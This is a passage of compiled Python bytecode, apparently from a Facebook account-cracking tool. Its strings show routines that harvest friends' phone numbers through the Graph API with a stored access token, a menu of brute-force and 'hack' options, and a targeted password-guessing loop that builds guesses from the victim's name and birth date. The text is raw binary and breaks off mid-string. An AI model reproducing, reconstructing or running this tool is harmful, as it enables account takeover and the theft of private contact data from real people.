0r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xy\x11\x00t\x00\x00j\x08\x00d\x07\x00\x83\x01\x00\x01Wn\x11\x00\x04t\t\x00k\n\x00r\x84\x00\x01\x01\x01n\x01\x00Xy\x92\x01t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\n\x00GHt\x0b\x00d\x08\x00\x83\x01\x00\x01d\t\x00d\n\x00\x14GHd\x0b\x00|\x00\x00\x17}\x01\x00t\x0c\x00j\r\x00|\x01\x00\x83\x01\x00}\x02\x00t\x0e\x00j\x0f\x00|\x02\x00j\x10\x00\x83\x01\x00}\x03\x00t\x02\x00d\x0c\x00d\r\x00\x83\x02\x00}\x04\x00x\xcb\x00|\x03\x00d\x0e\x00\x19D]\xbf\x00}\x05\x00t\x0c\x00j\r\x00d\x0f\x00|\x05\x00d\x10\x00\x19\x17d\x11\x00\x17|\x00\x00\x17\x83\x01\x00}\x06\x00t\x0e\x00j\x0f\x00|\x06\x00j\x10\x00\x83\x01\x00}\x03\x00yt\x00t\x11\x00j\x12\x00|\x03\x00d\x12\x00\x19\x83\x01\x00\x01|\x04\x00j\x13\x00|\x03\x00d\x12\x00\x19d\x13\x00\x17\x83\x01\x00\x01d\x14\x00t\x14\x00t\x15\x00t\x11\x00\x83\x01\x00\x83\x01\x00\x17d\x15\x00\x17|\x03\x00d\x12\x00\x19\x17d\x16\x00\x17|\x03\x00d\x17\x00\x19\x17d\x13\x00\x17Gt\x16\x00j\x17\x00j\x18\x00\x83\x00\x00\x01t\x05\x00j\x06\x00d\x18\x00\x83\x01\x00\x01Wq\xf2\x00\x04t\x19\x00k\n\x00r\xb0\x01\x01\x01\x01q\xf2\x00Xq\xf2\x00W|\x04\x00j\x1a\x00\x83\x00\x00\x01d\t\x00d\n\x00\x14GHd\x19\x00GHd\x1a\x00t\x15\x00t\x11\x00\x83\x01\x00\x16GHt\x1b\x00d\x1b\x00\x83\x01\x00}\x07\x00t\x00\x00j\x1c\x00d\x0c\x00d\x1c\x00|\x07\x00\x17\x83\x02\x00\x01d\x1d\x00|\x07\x00\x17GHt\x1b\x00d\x1e\x00\x83\x01\x00\x01t\x1d\x00\x83\x00\x00\x01Wn\x9b\x00\x04t\x04\x00k\n\x00r@\x02\x01\x01\x01d\x1f\x00GHt\x1b\x00d\x1e\x00\x83\x01\x00\x01t\x1d\x00\x83\x00\x00\x01nu\x00\x04t\x1e\x00t\x1f\x00f\x02\x00k\n\x00rl\x02\x01\x01\x01d \x00GHt\x1b\x00d\x1e\x00\x83\x01\x00\x01t\x1d\x00\x83\x00\x00\x01nI\x00\x04t\x19\x00k\n\x00r\x92\x02\x01\x01\x01d!\x00GHt\x1b\x00d\x1e\x00\x83\x01\x00\x01t\x1d\x00\x83\x00\x00\x01n#\x00\x04t\x0c\x00j \x00j!\x00k\n\x00r\xb4\x02\x01\x01\x01d"\x00GHt"\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S(#\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00R\x90\x00\x00\x00s:\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mGet all friend number phone \x1b[1;97m...i*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90s3\x00\x00\x00https://graph.facebook.com/me/friends?access_token=s\x13\x00\x00\x00out/nomer_teman.txtR\x11\x00\x00\x00Rl\x00\x00\x00s\x1b\x00\x00\x00https://graph.facebook.com/Rj\x00\x00\x00s\x0e\x00\x00\x00?access_token=Rw\x00\x00\x00s\x01\x00\x00\x00\ns\x11\x00\x00\x00\r\x1b[1;97m[ \x1b[1;92ms\x1a\x00\x00\x00\x1b[1;97m ]\x1b[1;97m=> \x1b[1;97ms\x03\x00\x00\x00 | R0\x00\x00\x00g-C\x1c\xeb\xe26\x1a?sF\x00\x00\x00\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mSuccessfully get number \x1b[1;97m....s2\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mTotal Number \x1b[1;91m: \x1b[1;97m%ss7\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mSave file with name\x1b[1;91m :\x1b[1;97m s\x04\x00\x00\x00out/s2\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mFile saved \x1b[1;91m: \x1b[1;97mout/s\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s\x1e\x00\x00\x00\x1b[1;91m[!] Error creating files\x12\x00\x00\x00\x1b[1;91m[!] Stoppeds\x10\x00\x00\x00\x1b[1;91m[!] Errors\x1a\x00\x00\x00\x1b[1;91m[\xe2\x9c\x96] No connection(#\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R\x91\x00\x00\x00R\x92\x00\x00\x00R.\x00\x00\x00R \x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00t\x02\x00\x00\x00hpR\x94\x00\x00\x00R\x19\x00\x00\x00R\x17\x00\x00\x00R\x0e\x00\x00\x00R\x06\x00\x00\x00R\x18\x00\x00\x00R\x1b\x00\x00\x00R,\x00\x00\x00Rg\x00\x00\x00R/\x00\x00\x00R\x95\x00\x00\x00R\x80\x00\x00\x00R\x96\x00\x00\x00R\x97\x00\x00\x00Ri\x00\x00\x00R\x01\x00\x00\x00R\x08\x00\x00\x00(\x08\x00\x00\x00R4\x00\x00\x00Rk\x00\x00\x00R\'\x00\x00\x00R\x1e\x00\x00\x00R\x98\x00\x00\x00t\x01\x00\x00\x00nR\x10\x00\x00\x00R\x99\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\x8d\x00\x00\x00@\x03\x00\x00sp\x00\x00\x00\x00\x01\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\x03\x01\x11\x01\r\x01\x04\x01\x03\x01\r\x01\x05\x01\n\x01\t\x01\n\x01\x0f\x01\x12\x01\x0f\x01\x11\x01\x1f\x01\x12\x01\x03\x01\x11\x01\x15\x010\x00\r\x00\x11\x01\r\x01\x08\x01\n\x01\t\x01\x05\x01\x0f\x01\x0c\x01\x14\x01\t\x01\n\x01\x0b\x01\r\x01\x05\x01\n\x01\n\x01\x13\x01\x05\x01\n\x01\n\x01\r\x01\x05\x01\n\x01\n\x01\x13\x01\x05\x01c\x00\x00\x00\x00\x0b\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s/\x03\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x04\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xy\x11\x00t\x00\x00j\x08\x00d\x07\x00\x83\x01\x00\x01Wn\x11\x00\x04t\t\x00k\n\x00r\x84\x00\x01\x01\x01n\x01\x00Xy\x08\x02t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\n\x00GHt\x0b\x00d\x08\x00\x83\x01\x00}\x01\x00y>\x00t\x0c\x00j\r\x00d\t\x00|\x01\x00\x17d\n\x00\x17|\x00\x00\x17\x83\x01\x00}\x02\x00t\x0e\x00j\x0f\x00|\x02\x00j\x10\x00\x83\x01\x00}\x03\x00d\x0b\x00|\x03\x00d\x0c\x00\x19\x17GHWn\'\x00\x04t\x11\x00k\n\x00r\r\x01\x01\x01\x01d\r\x00GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01n\x01\x00Xt\x0c\x00j\r\x00d\t\x00|\x01\x00\x17d\x0f\x00\x17|\x00\x00\x17\x83\x01\x00}\x04\x00t\x0e\x00j\x0f\x00|\x04\x00j\x10\x00\x83\x01\x00}\x05\x00t\x13\x00d\x10\x00\x83\x01\x00\x01d\x11\x00d\x12\x00\x14GHt\x02\x00d\x13\x00d\x14\x00\x83\x02\x00}\x06\x00x\xcb\x00|\x05\x00d\x15\x00\x19D]\xbf\x00}\x07\x00t\x0c\x00j\r\x00d\t\x00|\x07\x00d\x16\x00\x19\x17d\n\x00\x17|\x00\x00\x17\x83\x01\x00}\x08\x00t\x0e\x00j\x0f\x00|\x08\x00j\x10\x00\x83\x01\x00}\t\x00yt\x00t\x14\x00j\x15\x00|\t\x00d\x17\x00\x19\x83\x01\x00\x01|\x06\x00j\x16\x00|\t\x00d\x17\x00\x19d\x18\x00\x17\x83\x01\x00\x01d\x19\x00t\x17\x00t\x18\x00t\x14\x00\x83\x01\x00\x83\x01\x00\x17d\x1a\x00\x17|\t\x00d\x17\x00\x19\x17d\x1b\x00\x17|\t\x00d\x0c\x00\x19\x17d\x18\x00\x17Gt\x19\x00j\x1a\x00j\x1b\x00\x83\x00\x00\x01t\x05\x00j\x06\x00d\x1c\x00\x83\x01\x00\x01Wqh\x01\x04t\x11\x00k\n\x00r&\x02\x01\x01\x01qh\x01Xqh\x01W|\x06\x00j\x1c\x00\x83\x00\x00\x01d\x11\x00d\x12\x00\x14GHd\x1d\x00GHd\x1e\x00t\x18\x00t\x14\x00\x83\x01\x00\x16GHt\x0b\x00d\x1f\x00\x83\x01\x00}\n\x00t\x00\x00j\x1d\x00d\x13\x00d \x00|\n\x00\x17\x83\x02\x00\x01d!\x00|\n\x00\x17GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01Wn\x9b\x00\x04t\x04\x00k\n\x00r\xb6\x02\x01\x01\x01d"\x00GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01nu\x00\x04t\x1e\x00t\x1f\x00f\x02\x00k\n\x00r\xe2\x02\x01\x01\x01d#\x00GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01nI\x00\x04t\x11\x00k\n\x00r\x08\x03\x01\x01\x01d$\x00GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01n#\x00\x04t\x0c\x00j \x00j!\x00k\n\x00r*\x03\x01\x01\x01d%\x00GHt"\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S(&\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00R\x90\x00\x00\x00s2\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mInput ID friend \x1b[1;91m: \x1b[1;97ms\x1b\x00\x00\x00https://graph.facebook.com/s\x0e\x00\x00\x00?access_token=s7\x00\x00\x00\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m R0\x00\x00\x00s\x1b\x00\x00\x00\x1b[1;91m[!] Friend not founds\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s\x16\x00\x00\x00/friends?access_token=s@\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mGet all friend number from friend \x1b[1;97m...i*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90s\x1b\x00\x00\x00out/no_teman_from_teman.txtR\x11\x00\x00\x00Rl\x00\x00\x00Rj\x00\x00\x00Rw\x00\x00\x00s\x01\x00\x00\x00\ns\x11\x00\x00\x00\r\x1b[1;97m[ \x1b[1;92ms\x1a\x00\x00\x00\x1b[1;97m ]\x1b[1;97m=> \x1b[1;97ms\x03\x00\x00\x00 | g-C\x1c\xeb\xe26\x1a?sF\x00\x00\x00\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mSuccessfully get number \x1b[1;97m....s2\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mTotal Number \x1b[1;91m: \x1b[1;97m%ss7\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mSave file with name\x1b[1;91m :\x1b[1;97m s\x04\x00\x00\x00out/s2\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mFile saved \x1b[1;91m: \x1b[1;97mout/s\x1e\x00\x00\x00\x1b[1;91m[!] Error creating files\x12\x00\x00\x00\x1b[1;91m[!] Stoppeds\x10\x00\x00\x00\x1b[1;91m[!] Errors\x1a\x00\x00\x00\x1b[1;91m[\xe2\x9c\x96] No connection(#\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R\x91\x00\x00\x00R\x92\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00R,\x00\x00\x00R\x80\x00\x00\x00R \x00\x00\x00t\x0b\x00\x00\x00hpfromtemanR\x94\x00\x00\x00R\x19\x00\x00\x00R\x17\x00\x00\x00R\x0e\x00\x00\x00R\x06\x00\x00\x00R\x18\x00\x00\x00R\x1b\x00\x00\x00Rg\x00\x00\x00R\x95\x00\x00\x00R\x96\x00\x00\x00R\x97\x00\x00\x00Ri\x00\x00\x00R\x01\x00\x00\x00R\x08\x00\x00\x00(\x0b\x00\x00\x00R4\x00\x00\x00R\x9c\x00\x00\x00R\x9d\x00\x00\x00R\x9e\x00\x00\x00R\'\x00\x00\x00Rm\x00\x00\x00R\x98\x00\x00\x00R\x13\x00\x00\x00R\x10\x00\x00\x00R\x1e\x00\x00\x00R\x99\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\x8e\x00\x00\x00y\x03\x00\x00s\x80\x00\x00\x00\x00\x01\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\x03\x01\x11\x01\r\x01\x04\x01\x03\x01\r\x01\x05\x01\x0c\x01\x03\x01\x1b\x01\x12\x01\x11\x01\r\x01\x05\x01\n\x01\x0b\x01\x1b\x01\x12\x01\n\x01\t\x01\x0f\x01\x11\x01\x1f\x01\x12\x01\x03\x01\x11\x01\x15\x010\x00\r\x00\x11\x01\r\x01\x08\x01\n\x01\t\x01\x05\x01\x0f\x01\x0c\x01\x14\x01\t\x01\n\x01\x0b\x01\r\x01\x05\x01\n\x01\n\x01\x13\x01\x05\x01\n\x01\n\x01\r\x01\x05\x01\n\x01\n\x01\x13\x01\x05\x01c\x00\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\xa0\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x04\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x08\x00GHd\x07\x00GHd\x08\x00GHd\t\x00GHd\n\x00GHd\x0b\x00GHd\x0c\x00GHd\r\x00GHt\t\x00\x83\x00\x00\x01d\x00\x00S(\x0e\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00sN\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m1.\x1b[1;97m Mini Hack Facebook(\x1b[1;92mTarget\x1b[1;97m)s?\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m2.\x1b[1;97m Multi Bruteforce FacebooksE\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m3.\x1b[1;97m Super Multi Bruteforce FacebooksF\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m4.\x1b[1;97m BruteForce(\x1b[1;92mTarget\x1b[1;97m)s3\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m5.\x1b[1;97m Yahoo Checkers*\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;91m0.\x1b[1;97m Backs\x03\x00\x00\x00\xe2\x95\x91(\n\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R.\x00\x00\x00t\n\x00\x00\x00hack_pilih(\x01\x00\x00\x00R4\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>Rv\x00\x00\x00\xba\x03\x00\x00s$\x00\x00\x00\x00\x01\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\r\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01c\x00\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s\xc2\x00\x00\x00t\x00\x00d\x01\x00\x83\x01\x00}\x00\x00|\x00\x00d\x02\x00k\x02\x00r\'\x00d\x03\x00GHt\x01\x00\x83\x00\x00\x01n\x97\x00|\x00\x00d\x04\x00k\x02\x00r=\x00t\x02\x00\x83\x00\x00\x01n\x81\x00|\x00\x00d\x05\x00k\x02\x00rZ\x00t\x03\x00\x83\x00\x00\x01t\x04\x00\x83\x00\x00\x01nd\x00|\x00\x00d\x06\x00k\x02\x00rp\x00t\x05\x00\x83\x00\x00\x01nN\x00|\x00\x00d\x07\x00k\x02\x00r\x86\x00t\x06\x00\x83\x00\x00\x01n8\x00|\x00\x00d\x08\x00k\x02\x00r\x9c\x00t\x07\x00\x83\x00\x00\x01n"\x00|\x00\x00d\t\x00k\x02\x00r\xb2\x00t\x08\x00\x83\x00\x00\x01n\x0c\x00d\x03\x00GHt\x01\x00\x83\x00\x00\x01d\x00\x00S(\n\x00\x00\x00Ns\x1d\x00\x00\x00\x1b[1;97m\xe2\x95\x9a\xe2\x95\x90\x1b[1;91mD \x1b[1;97mR\n\x00\x00\x00s\x16\x00\x00\x00\x1b[1;91m[!] Wrong inputR8\x00\x00\x00R9\x00\x00\x00Rs\x00\x00\x00Rt\x00\x00\x00R\x81\x00\x00\x00R:\x00\x00\x00(\t\x00\x00\x00R/\x00\x00\x00R\xaa\x00\x00\x00t\x04\x00\x00\x00minit\x05\x00\x00\x00crackt\x05\x00\x00\x00hasilt\x05\x00\x00\x00supert\x05\x00\x00\x00brutet\n\x00\x00\x00menu_yahooR+\x00\x00\x00(\x01\x00\x00\x00t\x04\x00\x00\x00hack(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\xaa\x00\x00\x00\xce\x03\x00\x00s&\x00\x00\x00\x00\x01\x0c\x01\x0c\x01\x05\x01\n\x01\x0c\x01\n\x01\x0c\x01\x07\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x02\x05\x01c\x00\x00\x00\x00\x10\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\x05\x07\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x04\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x08\x00GHd\x07\x00GHd\x08\x00d\t\x00\x14GHyW\x06t\t\x00d\n\x00\x83\x01\x00}\x01\x00t\n\x00d\x0b\x00\x83\x01\x00\x01t\x0b\x00j\x0c\x00d\x0c\x00|\x01\x00\x17d\r\x00\x17|\x00\x00\x17\x83\x01\x00}\x02\x00t\r\x00j\x0e\x00|\x02\x00j\x0f\x00\x83\x01\x00}\x03\x00d\x0e\x00|\x03\x00d\x0f\x00\x19\x17GHt\n\x00d\x10\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x11\x00\x83\x01\x00\x01t\n\x00d\x12\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x11\x00\x83\x01\x00\x01d\x08\x00d\t\x00\x14GH|\x03\x00d\x13\x00\x19d\x14\x00\x17}\x04\x00t\x10\x00j\x11\x00d\x15\x00|\x01\x00\x17d\x16\x00\x17|\x04\x00\x17d\x17\x00\x17\x83\x01\x00}\x05\x00t\r\x00j\x12\x00|\x05\x00\x83\x01\x00}\x06\x00d\x18\x00|\x06\x00k\x06\x00r\x8a\x01d\x19\x00GHd\x1a\x00|\x03\x00d\x0f\x00\x19\x17GHd\x1b\x00|\x01\x00\x17GHd\x1c\x00|\x04\x00\x17GHt\t\x00d\x1d\x00\x83\x01\x00\x01t\x13\x00\x83\x00\x00\x01nL\x05d\x1e\x00|\x06\x00d\x1f\x00\x19k\x06\x00r\xd7\x01d\x19\x00GHd \x00GHd\x1a\x00|\x03\x00d\x0f\x00\x19\x17GHd\x1b\x00|\x01\x00\x17GHd\x1c\x00|\x04\x00\x17GHt\t\x00d\x1d\x00\x83\x01\x00\x01t\x13\x00\x83\x00\x00\x01n\xff\x04|\x03\x00d!\x00\x19}\x07\x00t\x10\x00j\x11\x00d\x15\x00|\x01\x00\x17d\x16\x00\x17|\x07\x00\x17d\x17\x00\x17\x83\x01\x00}\x05\x00t\r\x00j\x12\x00|\x05\x00\x83\x01\x00}\x06\x00d\x18\x00|\x06\x00k\x06\x00rS\x02d\x19\x00GHd\x1a\x00|\x03\x00d\x0f\x00\x19\x17GHd\x1b\x00|\x01\x00\x17GHd\x1c\x00|\x07\x00\x17GHt\t\x00d\x1d\x00\x83\x01\x00\x01t\x13\x00\x83\x00\x00\x01n\x83\x04d\x1e\x00|\x06\x00d\x1f\x00\x19k\x06\x00r\xa0\x02d\x19\x00GHd \x00GHd\x1a\x00|\x03\x00d\x0f\x00\x19\x17GHd\x1b\x00|\x01\x00\x17GHd\x1c\x00|\x07\x00\x17GHt\t\x00d\x1d\x00\x83\x01\x00\x01t\x13\x00\x83\x00\x00\x01n6\x04|\x03\x00d"\x00\x19d#\x00\x17}\x08\x00t\x10\x00j\x11\x00d\x15\x00|\x01\x00\x17d\x16\x00\x17|\x08\x00\x17d\x17\x00\x17\x83\x01\x00}\x05\x00t\r\x00j\x12\x00|\x05\x00\x83\x01\x00}\x06\x00d\x18\x00|\x06\x00k\x06\x00r \x03d\x19\x00GHd\x1a\x00|\x03\x00d\x0f\x00\x19\x17GHd\x1b\x00|\x01\x00\x17GHd\x1c\x00|\x08\x00\x17GHt\t\x00d\x1d\x00\x83\x01\x00\x01t\x13\x00\x83\x00\x00\x01n\xb6\x03d\x1e\x00|\x06\x00d\x1f\x00\x19k\x06\x00rm\x03d\x19\x00GHd \x00GHd\x1a\x00|\x03\x00d\x0f\x00\x19\x17GHd\x1b\x00|\x01\x00\x17GHd\x1c\x00|\x08\x00\x17GHt\t\x00d\x1d\x00\x83\x01\x00\x01t\x13\x00\x83\x00\x00\x01ni\x03|\x03\x00d$\x00\x19}\t\x00|\t\x00j\x14\x00d%\x00d&\x00\x83\x02\x00}\n\x00t\x10\x00j\x11\x00d\x15\x00|\x01\x00\x17d\x16\x00\x17|\n\x00\x17d\x17\x00\x17\x83\x01\x00}\x05\x00t\r\x00j\x12\x00|\x05\x00\x83\x01\x00}\x06\x00d\x18\x00|\x06\x00k\x06\x00r\xfb\x03d\x19\x00GHd\x1a\x00|\x03\x00d\x0f\x00\x19\x17GHd\x1b\x00|\x01\x00\x17GHd\x1c\x00|\n\x00\x17GHt\t\x00d\x1d\x00\x83\x01\x00\x01t\x13\x00\x83\x00\x00\x01n\xdb\x02d\x1e\x00|\x06\x00d\x1f\x00\x19k\x06\x00rH\x04d\x19\x00GHd \x00GHd\x1a\x00|\x03\x00d\x0f\x00\x19\x17GHd\x1b\x00|\x01\x00\x17GHd\x1c\x00|\n\x00\x17GHt\t\x00d\x1d\x00\x83\x01\x00\x01t\x13\x00\x83\x00\x00\x01n\x8e\x02|\x03\x00d$\x00\x19}\x0b\x00|\x0b\x00j\x14\x00d%\x00d&\x00\x83\x02\x00}\x0c\x00|\x03\x00d\x13\x00\x19|\x0c\x00\x17}\r\x00t\x10\x00j\x11\x00d\x15\x00|\x01\x00\x17d\x16\x00\x17|\r\x00\x17d\x17\x00\x17\x83\x01\x00}\x05\x00t\r\x00j\x12\x00|\x05\x00\x83\x01\x00}\x06\x00d\x18\x00|\x06\x00k\x06\x00r\xe4\x04d\x19\x00GHd\x1a\x00|\x03\x00d\x0f\x00\x19\x17GHd\x1b\x00|\x01\x00\x17GHd\x1c\x00|\r\x00\x17GHt\t\x00d\x1d\x00\x83\x01\x00\x01t\x13\x00\x83\x00\x00\x01n\xf2\x01d\x1e\x00|\x06\x00d\x1f\x00\x19k\x06\x00r1\x05d\x19\x00GHd \x00GHd\x1a\x00|\x03\x00d\x0f\x00\x19\x17GHd\x1b\x00|\x01\x00\x17GHd\x1c\x00|\r\x00\x17GHt\t\x00d\x1d\x00\x83\x01\x00\x01t\x13\x00\x83\x00\x00\x01n\xa5\x01d\'\x00}\x0e\x00t\x10\x00j\x11\x00d\x15\x00|\x01\x00\x17d\x16\x00\x17|\x0e\x00\x17d\x17\x00\x17\x83\x01\x00}\x05\x00t\r\x00j\x12\x00|\x05\x00\x83\x01\x00}\x06\x00d\x18\x00|\x06\x00k\x06\x00r\xa9\x05d\x19\x00GHd\x1a\x00|\x03\x00d\x0f\x00\x19\x17GHd\x1b\x00|\x01\x00\x17GHd\x1c\x00|\x0e\x00\x17GHt\t\x00d\x1d\x00\x83\x01\x00\x01t\x13\x00\x83\x00\x00\x01n-\x01d\x1e\x00|\x06\x00d\x1f\x00\x19k\x06\x00r\xf6\x05d\x19\x00GHd \x00GHd\x1a\x00|\x03\x00d\x0f\x00\x19\x17GHd\x1b\x00|\x01\x00\x17GHd\x1c\x00|\x0e\x00\x17GHt\t\x00d\x1d\x00\x83\x01\x00\x01t\x13\x00\x83\x00\x00\x01n\xe0\x00d(\x00}\x0f\x00t\x10\x00j\x11\x00d\x15\x00|\x01\x00\x17d\x16\x00\x17|\x0f\x00\x17d\x17\x00\x17\x83\x01\x00}\x05\x00t\r\x00j\x12\x00|\x05\x00\x83\x01\x00}\x06\x00d\x18\x00|\x06\x00k\x06\x00rn\x06d\x19\x00GHd\x1a\x00|\x03\x00d\x0f\x00\x19\x17GHd\x1b\x00|\x01\x00\x17GHd\x1c\x00|\x0f\x00\x17GHt\t\x00d\x1d\x00\x83\x01\x00\x01t\x13\x00\x83\x00\x00\x01nh\x00d\x1e\x00|\x06\x00d\x1f\x00\x19k\x06\x00r\xbb\x06d\x19\x00GHd \x00GHd\x1a\x00|\x03\x00d\x0f\x00\x19\x17GHd\x1b\x00|\x01\x00\x17GHd\x1c\x00|\x0e\x00\x17GHt\t\x00d\x1d\x00\x83\x01\x00\x01t\x13\x00\x83\x00\x00\x01n\x1b\x00d)\x00GHd*\x00GHt\t\x00d\x1d\x00\x83\x01\x00\x01t\x13\x00\x83\x00\x00\x01Wn\'\x00\x04t\x15\x00k\n\x00r\x00\x07\x01\x01\x01d+\x00GHt\t\x00d\x1d\x00\x83\x01\x00\x01t\x13\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S(,\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00se\x00\x00\x00\x1b[1;97m[\x1b[1;91mINFO\x1b[1;97m] \x1b[1;91mThe target account must be friends\n with your account first!i*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90s,\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mTarget ID \x1b[1;91m:\x1b[1;97m s,\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mWait a minute \x1b[1;97m...s\x1b\x00\x00\x00https://graph.facebook.com/s\x0e\x00\x00\x00?access_token=s"\x00\x00\x00\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mName\x1b[1;97m : R0\x00\x00\x00s"\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mCheck \x1b[1;97m...i\x02\x00\x00\x00s*\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mOpen password 